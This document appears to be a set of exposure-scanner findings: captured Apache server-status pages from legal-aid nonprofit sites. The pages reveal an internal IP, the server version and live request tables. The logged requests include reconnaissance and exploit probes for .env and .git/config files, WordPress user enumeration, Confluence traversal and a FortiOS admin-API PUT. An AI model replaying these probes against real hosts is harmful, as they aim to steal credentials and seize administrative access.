/api/v2/cmdb/system/admin/admin HTTP/1.1 32-114208821/8/24130K 0.41001.10.111138.41 130.176.208.180http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 33-114209220/6/23760_ 0.295530.00.251124.06 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /about HTTP/1.1 34-114204520/11/24937_ 0.51600.00.161086.57 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.6 35-114204611/15/26416K 0.65011.40.091149.03 130.176.208.180http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 36-114204620/10/22948_ 0.7251600.00.471008.72 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/zxcvbn.min.js HTTP/1.1 37-114209230/6/23499_ 0.265780.01.021058.34 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 38-114204670/15/23027_ 0.970520.00.431015.69 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 39-114209240/6/22436_ 0.00200.00.01936.87 70.132.31.90http/1.1picturingjustice.org:8080GET / HTTP/1.1 40-114204720/12/23693_ 0.56650.00.32997.95 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/mediaelement-and-player.min.js 41-114-0/0/4963. 0.62700.00.00210.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-114-0/0/2826. 0.35500.00.00108.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-114204870/8/3169_ 0.52660.00.13137.33 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/contact-form-7-conditional-fields-pro/j 44-114205049/21/2002K 0.630022.00.34129.81 130.176.208.180http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 45-114205050/12/1936_ 0.5051320.00.2795.39 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 46-114209260/3/1815_ 0.659620.00.2248.29 15.158.47.115http/1.1elearning.alas.org:8080GET /lib/requirejs.php/1564020885/core/first.js HTTP/1.1 47-114205150/11/1944_ 0.45800.00.2184.63 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/buddypress/bp-core/js/widget-members.mi 48-114209270/10/1572_ 0.260570.00.1452.75 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 49-114209280/5/1463_ 0.25600.00.1055.44 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/media-editor.min.js?ver=5.6.9 HTTP/1.1 50-114209290/9/1297_ 0.196
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed2140226a
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:02:25 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 18 minutes 44 seconds Server load: 7.79 2.02 0.67 Total accesses: 5117946 - Total Traffic: 242.1 GB CPU Usage: u64.62 s9.46 cu0 cs0 - .000747% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 42 requests currently being processed, 99 idle workers ___K_C_____K___KK_K____._____K_KK__K_____.._K________KKKKK______ _K_.K__K_..K____K_W___KK__K_K__KK__K__________K__K.KK_KK________ ..__KK___K__K__K_K___K Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114208260/10/315822_ 0.49540.00.2115274.73 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/media-views.min.js?ver=5.6.9 HTTP/1.1 1-114208360/11/307288_ 0.440610.00.2815604.10 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /v2/_catalog HTTP/1.1 2-114202770/14/296203_ 0.48800.00.6114399.81 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/shortcode-for-current-date/dist/script. 3-114202781/14/291725K 0.72011.40.4414074.89 130.176.208.180http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 4-114202870/20/280075_ 0.42800.00.1214108.18 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/plugins/buddypress/bp-core/js/vendor/jquery-coo 5-114208371/4/270954C 0.71000.20.0513303.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-114208460/10/257853_ 0.364890.00.2412980.38 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 7-114203470/17/249549_ 0.4941660.00.5112283.52 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 8-114208470/7/236975_ 0.30800.00.2311522.25 64.252.75.130http/1.1intranet.alas.org:8080GET /wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect 9-114208480/5/226041_ 0.42800.00.0511118.82 15.158.47.74http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5. 10-114200190/32/214615_ 2.35500.01.5010231.84 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/clipboard.min.js?ver=5.6.9 HTTP/1.1 11-114208491/6/192021K 0.27001.10.029331.34 130.176.208.180http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 12-114203640/8/176710_ 0.604700.00.038770.58 70.132.36.172http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 13-114208750/6/168051_ 0.32500.00.058058.79 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-util.min.js?ver=5.6.9 HTTP/1.1 14-114208760/5/156067_ 0.32500.00.057530.94 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-backbone.min.js?ver=5.6.9 HTTP/1.1 15-114203841/9/149540K 0.65001.10.307254.66 130.176.208.180http/1.1legalaidconnections.org:8080GET /.git/config HTTP/1.1 16-114203851/11/134169K 0.80201.00.286325.06 15.158.50.13http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 17-114196100/84/112414_ 8.100530.01.795336.20 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /about HTTP/1.1 18-114208771/7/103355K 0.42001.10.225129.02 130.176.208.180http/1.1legalaidconnections.org:8080GET /.git/config HTTP/1.1 19-114199130/56/93822_ 3.065210.02.784748.88 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/themes/woffice/js/woffice.min.js HTTP/1.1 20-114208780/6/93903_ 0.160810.00.104523.92 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 21-114208790/9/86198_ 0.2241900.00.764052.18 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 22-114204010/8/84820_ 0.789980.00.324104.98 15.158.47.115http/1.1elearning.alas.org:8080GET /pluginfile.php/162/course/overviewfiles/Moodle%20images%20 23-114-0/0/79171. 0.71200.00.003709.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-114208800/9/71775_ 0.511590.00.233443.28 130.176.208.148http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 25-114204240/10/38028_ 0.42500.00.231723.78 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/api-request.min.js?ver=5.6.9 HTTP/1.1 26-114204250/10/30108_ 0.39500.00.221388.77 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-embed.min.js?ver=5.6.9 HTTP/1.1 27-114204300/13/27640_ 0.780560.00.381254.09 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /api/search?folderIds=0 HTTP/1.1 28-114204350/14/25412_ 0.305330.00.741161.96 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/uploads/2020/03/1.jpg HTTP/1.1 29-114200921/30/23715K 1.90001.44.981038.81 130.176.208.180http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 30-114204400/11/25348_ 0.60500.00.191138.96 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/shortcode.min.js?ver=5.6.9 HTTP/1.1 31-114208811/5/23304K 0.10001.30.051016.86 130.176.208.180http/1.1legalaidconnections.org:8080PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 32-114208821/8/24130K 0.41001.10.111138.41 130.176.208.180http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 33-114209220/6/23760_ 0.294530.00.251124.06 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /about HTTP/1.1 34-114204520/11/24937_ 0.51500.00.161086.57 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.6 35-114204611/15/26416K 0.65011.40.091149.03 130.176.208.180http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 36-114204620/10/22948_ 0.7241600.00.471008.72 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/zxcvbn.min.js HTTP/1.1 37-114209230/6/23499_ 0.264780.01.021058.34 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 38-114204670/15/23027_ 0.970520.00.431015.69 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 39-114209240/6/22436_ 0.00100.00.01936.87 70.132.31.90http/1.1picturingjustice.org:8080GET / HTTP/1.1 40-114204720/12/23693_ 0.56550.00.32997.95 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/mediaelement-and-player.min.js 41-114-0/0/4963. 0.62600.00.00210.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-114-0/0/2826. 0.35400.00.00108.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-114204870/8/3169_ 0.52560.00.13137.33 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/contact-form-7-conditional-fields-pro/j 44-114205048/20/2001K 0.630020.60.34129.80 130.176.208.180http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 45-114205050/12/1936_ 0.5041320.00.2795.39 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 46-114209260/3/1815_ 0.658620.00.2248.29 15.158.47.115http/1.1elearning.alas.org:8080GET /lib/requirejs.php/1564020885/core/first.js HTTP/1.1 47-114205150/11/1944_ 0.45800.00.2184.63 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/buddypress/bp-core/js/widget-members.mi 48-114209270/10/1572_ 0.260570.00.1452.75 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 49-114209280/5/1463_ 0.25500.00.1055.44 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/media-editor.min.js?ver=5.6.9 HTTP/1.1 50-114209290/9/1297
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627eda67bc3c8
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:02:25 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 18 minutes 44 seconds Server load: 7.79 2.02 0.67 Total accesses: 5117912 - Total Traffic: 242.1 GB CPU Usage: u64.59 s9.45 cu0 cs0 - .000747% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 21 requests currently being processed, 120 idle workers _____C__________K______._________________.._K_________KKKK______ ___._____..___________KK____K__K___K_____________W.K__K_________ ..__K____K__K__K_K___K Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114208260/10/315822_ 0.49540.00.2115274.73 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/media-views.min.js?ver=5.6.9 HTTP/1.1 1-114208360/11/307288_ 0.440610.00.2815604.10 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /v2/_catalog HTTP/1.1 2-114202770/14/296203_ 0.48700.00.6114399.81 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/shortcode-for-current-date/dist/script. 3-114202780/13/291724_ 0.71900.00.4414074.89 130.176.163.160http/1.1esign.alas.org:8080GET /assets/libs/switchery/switchery.min.css HTTP/1.1 4-114202870/20/280075_ 0.42700.00.1214108.18 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/plugins/buddypress/bp-core/js/vendor/jquery-coo 5-114208371/4/270954C 0.71000.20.0513303.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-114208460/10/257853_ 0.364890.00.2412980.38 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 7-114203470/17/249549_ 0.4941660.00.5112283.52 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 8-114208470/7/236975_ 0.30700.00.2311522.25 64.252.75.130http/1.1intranet.alas.org:8080GET /wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect 9-114208480/5/226041_ 0.42700.00.0511118.82 15.158.47.74http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5. 10-114200190/32/214615_ 2.35500.01.5010231.84 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/clipboard.min.js?ver=5.6.9 HTTP/1.1 11-114208490/5/192020_ 0.27930.00.029331.34 15.158.47.114http/1.1elearning.alas.org:8080GET /theme/yui_combo.php?rollup/3.17.2/yui-moodlesimple-min.css 12-114203640/8/176710_ 0.604700.00.038770.58 70.132.36.172http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 13-114208750/6/168051_ 0.32500.00.058058.79 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-util.min.js?ver=5.6.9 HTTP/1.1 14-114208760/5/156067_ 0.32500.00.057530.94 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-backbone.min.js?ver=5.6.9 HTTP/1.1 15-114203840/8/149539_ 0.659590.00.297254.66 15.158.47.68http/1.1elearning.alas.org:8080GET /theme/yui_combo.php?rollup/3.17.2/yui-moodlesimple-min.js 16-114203851/11/134169K 0.80201.00.286325.06 15.158.50.13http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 17-114196100/84/112414_ 8.100530.01.795336.20 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /about HTTP/1.1 18-114208770/6/103354_ 0.429210.00.225129.02 130.176.163.160http/1.1esign.alas.org:8080GET /assets/fonts/Lato/Lato-Bold.ttf HTTP/1.1 19-114199130/56/93822_ 3.065210.02.784748.88 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/themes/woffice/js/woffice.min.js HTTP/1.1 20-114208780/6/93903_ 0.160810.00.104523.92 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 21-114208790/9/86198_ 0.2241900.00.764052.18 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 22-114204010/8/84820_ 0.789980.00.324104.98 15.158.47.115http/1.1elearning.alas.org:8080GET /pluginfile.php/162/course/overviewfiles/Moodle%20images%20 23-114-0/0/79171. 0.71200.00.003709.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-114208800/9/71775_ 0.510590.00.233443.28 130.176.208.148http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 25-114204240/10/38028_ 0.42500.00.231723.78 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/api-request.min.js?ver=5.6.9 HTTP/1.1 26-114204250/10/30108_ 0.39500.00.221388.77 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-embed.min.js?ver=5.6.9 HTTP/1.1 27-114204300/13/27640_ 0.780560.00.381254.09 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /api/search?folderIds=0 HTTP/1.1 28-114204350/14/25412_ 0.305330.00.741161.96 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/uploads/2020/03/1.jpg HTTP/1.1 29-114200920/29/23714_ 1.9092250.04.981038.81 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 30-114204400/11/25348_ 0.60500.00.191138.96 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/shortcode.min.js?ver=5.6.9 HTTP/1.1 31-114208810/4/23303_ 0.10930.00.051016.86 15.158.47.117http/1.1elearning.alas.org:8080GET /lib/javascript.php/1564020885/lib/requirejs/require.min.js 32-114208820/7/24129_ 0.40900.00.111138.41 130.176.163.160http/1.1esign.alas.org:8080GET /assets/libs/sweetalert/sweetalert.css HTTP/1.1 33-114209220/6/23760_ 0.294530.00.251124.06 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /about HTTP/1.1 34-114204520/11/24937_ 0.51500.00.161086.57 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.6 35-114204610/14/26415_ 0.65900.00.091149.03 130.176.163.160http/1.1esign.alas.org:8080GET /assets/js//jquery.slimscroll.min.js HTTP/1.1 36-114204620/10/22948_ 0.7241600.00.471008.72 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/zxcvbn.min.js HTTP/1.1 37-114209230/6/23499_ 0.264780.01.021058.34 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 38-114204670/15/23027_ 0.970520.00.431015.69 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 39-114209240/6/22436_ 0.00100.00.01936.87 70.132.31.90http/1.1picturingjustice.org:8080GET / HTTP/1.1 40-114204720/12/23693_ 0.56550.00.32997.95 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/mediaelement-and-player.min.js 41-114-0/0/4963. 0.62600.00.00210.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-114-0/0/2826. 0.35400.00.00108.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-114204870/8/3169_ 0.52560.00.13137.33 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/contact-form-7-conditional-fields-pro/j 44-114205047/19/2000K 0.632019.50.34129.80 130.176.208.180http/1.1legalaidconnections.org:8080GET / HTTP/1.1 45-114205050/12/1936_ 0.5041320.00.2795.39 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 46-114209260/3/1815_ 0.658620.00.2248.29 15.158.47.115http/1.1elearning.alas.org:8080GET /lib/requirejs.php/1564020885/core/first.js HTTP/1.1 47-114205150/11/1944_ 0.45700.00.2184.63 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/buddypress/bp-core/js/widget-members.mi 48-114209270/10/1572_ 0.260570.00.1452.75 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 49-114209280/5/1463_ 0.25500.00.1055.44 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/media-editor.min.js?ver=5.6.9 HTTP/1.1 50-114209290/9
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed8b3ae92d
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:06:28 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 47 seconds Server load: 5.87 1.77 0.61 Total accesses: 2348700 - Total Traffic: 111.6 GB CPU Usage: u70.64 s10.09 cu0 cs0 - .00171% CPU load .497 requests/sec - 24.8 kB/second - 49.8 kB/request 29 requests currently being processed, 93 idle workers CKK___.__K______.KK____.__K_..WK__.K.__K.__KK___.______KKK__._._ K._..___K__________________.K_K___K_._.KK_.K_..__._..__.______._ ___.K.._K_K________KK_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-54284391/14/149117C 1.13000.20.117129.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-54282742/26/146315K 0.72202.30.487406.39 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-54282793/25/138693K 2.39004.30.406786.85 70.132.63.132http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 3-54284440/4/138060_ 1.06122550.00.116843.78 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 4-54284510/6/132815_ 1.272111170.00.276872.45 70.132.63.132http/1.1survey.alas.org:8080GET / HTTP/1.1 5-54277790/79/127554_ 6.38123710.02.146306.05 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 6-54-0/0/123208. 1.971300.00.006154.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-54279600/58/116766_ 5.53100.01.125991.82 15.158.43.200http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 8-54284280/9/111213_ 2.50200.00.095413.86 15.158.43.200http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 9-54284522/12/109803K 1.543183.10.225360.63 130.176.29.140http/1.1legalaidconnections.org:8080GET / HTTP/1.1 10-54284610/7/103120_ 1.2591260.00.174844.88 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 11-54284620/8/90827_ 0.54204790.00.084417.14 70.132.63.132http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 12-54284630/8/81752_ 0.74400.00.084061.28 70.132.63.132http/1.1picturingjustice.org:8080GET /s/31332e3232342e3138392e3236/_/;/META-INF/maven/com.atlass 13-54283940/11/76026_ 1.292111000.00.033612.15 70.132.63.132http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 14-54277900/77/71387_ 6.94220.03.333478.01 15.158.43.200http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 15-54284640/12/68080_ 0.45105250.00.083513.42 130.176.211.201http/1.1atlantalegalaid.org:8080HEAD / HTTP/1.1 16-54-0/0/58815. 1.31600.00.002692.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-54283059/24/48141K 1.992094.70.552319.89 70.132.63.132http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 18-54284821/4/44104K 0.55301.10.002305.00 70.132.63.132http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 19-54284830/6/40560_ 1.255610.00.221989.78 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 20-54284880/4/41159_ 0.5771630.00.012010.74 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 21-54284890/13/35255_ 0.35400.00.171734.06 70.132.63.132http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 22-54284900/6/38400_ 0.59400.00.011750.95 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 23-54-0/0/34537. 1.321000.00.001616.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-54284920/8/31223_ 0.686930.00.061522.01 130.176.137.155http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-54285210/9/16891_ 0.10200.00.05728.46 15.158.43.200http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 26-54285222/11/11335K 0.10203.20.06570.90 70.132.63.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 27-54285230/8/11706_ 0.102112810.00.01472.33 70.132.63.132http/1.1survey.alas.org:8080GET /info.php HTTP/1.1 28-54-0/0/9877. 0.532300.00.00430.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-54-0/0/9781. 0.24500.00.00403.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-54285262/7/10669W 0.31002.70.05492.76 70.132.63.132http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 31-54285271/5/9054K 0.33201.60.08376.45 70.132.63.80http/1.1picturingjustice.org:8080GET / HTTP/1.1 32-54285280/5/10172_ 0.15125210.00.09452.37 70.132.63.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 33-54285330/5/10596_ 1.02100.00.00457.74 15.158.43.200http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 34-54-0/0/10174. 0.542200.00.00466.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-54285591/3/10775K 0.58211.70.03445.12 204.246.166.105http/1.1legalaidconnections.org:8080GET / HTTP/1.1 36-54-0/0/9041. 0.532600.00.00379.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-54285690/5/10091_ 0.72400.00.01404.91 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 38-54285700/3/8217_ 0.64123900.00.15401.63 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 39-54285911/3/9921K 0.55301.10.02383.62 70.132.63.132http/1.1legalaidconnections.org:8080GET /s/31332e3232342e3138392e3734/_/;/META-INF/maven/com.atlass 40-54-0/0/10176. 0.271200.00.00360.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-54286010/7/2156_ 0.41101330.00.2678.92 70.132.63.132http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 42-54286020/7/1049_ 0.64400.00.0940.33 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 43-54286032/7/1041K 0.28102.10.0545.03 70.132.63.132http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 44-54286047/8/639K 0.652091.10.1171.24 70.132.63.132http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 45-54286050/8/995_ 0.64300.00.0953.02 70.132.63.132http/1.1picturingjustice.org:8080GET / HTTP/1.1 46-54286060/3/685_ 0.66123230.00.1517.30 70.132.63.165http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 47-54286070/4/1013_ 0.162110340.00.0546.81 70.132.63.132http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 48-54-0/0/688. 0.402400.00.0020.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-54286090/5/699_ 0.192111770.00.0521.45 70.132.63.132http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 50-54286100/8/631_ 0.082111130.00.0128.45 70.132.63.132http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 51-54286430/6/744_ 0.66200.00.1227.37 15.158.43.200http/1.1picturingjustice.org:8080GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 52-54286480/6/685_ 0.13204580.00.0421.08 70.132.63.132http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 53-54286490/8/502_ 0.0771380.00.0120.15 70.132.63.165http/1.1gwinnettf
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed73b53a3a
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Thursday, 18-Aug-2022 00:06:24 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 54 days 17 hours 22 minutes 43 seconds Server load: 5.87 1.77 0.61 Total accesses: 2348645 - Total Traffic: 111.6 GB CPU Usage: u70.63 s10.07 cu0 cs0 - .00171% CPU load .497 requests/sec - 24.8 kB/second - 49.8 kB/request 25 requests currently being processed, 101 idle workers ______.KKK____K_.K_____._K__..___K._.___.___K___.__K___K____._.K KC_..______________________.WC______.C.K__.L_._K_._..__.______._ ____K.__K_K________KKK Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU 